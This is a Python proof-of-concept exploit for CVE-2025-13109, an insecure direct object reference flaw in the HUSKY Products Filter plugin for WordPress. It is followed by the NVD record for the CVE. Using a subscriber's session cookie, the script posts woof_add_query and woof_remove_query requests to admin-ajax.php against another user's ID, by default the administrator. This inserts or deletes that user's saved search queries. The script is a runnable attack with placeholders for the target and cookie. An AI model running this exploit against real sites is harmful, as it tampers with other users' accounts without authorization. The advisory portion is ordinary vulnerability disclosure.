CVE-2025-13109

import requests import sys from urllib.parse import urlencode # CVE-2025-13109 PoC - IDOR in HUSKY Products Filter Plugin # Target: WordPress with HUSKY plugin <= 1.3.7.2 TARGET_URL = "http://target-wordpress-site.com" ATTACKER_COOKIE = "wordpress_logged_in_cookie_here" TARGET_USER_ID = 1 # Target user ID (1 is usually admin) def add_malicious_query(): """Insert arbitrary saved search query into target user's profile""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" headers = { "Cookie": ATTACKER_COOKIE, "Content-Type": "application/x-www-form-urlencoded" } # Malicious payload - IDOR via user controlled key data = { "action": "woof_add_query", "user_id": TARGET_USER_ID, # IDOR: No validation that attacker owns this user_id "woof_query_key": "malicious_query", "woof_query_data": "{\"price\":{\"min\":0,\"max\":0},\"stock_status\":\"instock\"}" } try: response = requests.post(endpoint, headers=headers, data=data, timeout=10) print(f"[*] Request sent to {endpoint}") print(f"[*] Response status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code == 200: print("[+] Malicious query may have been added successfully") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def remove_user_query(): """Remove saved search query from target user's profile""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" headers = { "Cookie": ATTACKER_COOKIE, "Content-Type": "application/x-www-form-urlencoded" } data = { "action": "woof_remove_query", "user_id": TARGET_USER_ID, # IDOR vulnerability "woof_query_key": "legitimate_query" } try: response = requests.post(endpoint, headers=headers, data=data, timeout=10) print(f"[*] Remove query request sent") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("="*60) print("CVE-2025-13109 PoC - HUSKY Plugin IDOR Vulnerability") print("="*60) print("\n[*] Exploiting IDOR in woof_add_query/woof_remove_query") print(f"[*] Target: {TARGET_URL}") print(f"[*] Target User ID: {TARGET_USER_ID}\n") print("[1] Attempting to add malicious query...") add_malicious_query() print("\n[2] Attempting to remove legitimate query...") remove_user_query() print("\n[*] PoC execution completed")

{"cve": {"id": "CVE-2025-13109", "sourceIdentifier": "[email protected]", "published": "2025-12-03T13:16:01.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.2 via the \"woof_add_query\" and \"woof_remove_query\" functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to insert or remove arbitrary saved search queries into any user's profile, including administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3400527", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9effc186-c225-4b3b-9b8c-c453505a41de?source=cve", "source": "[email protected]"}]}}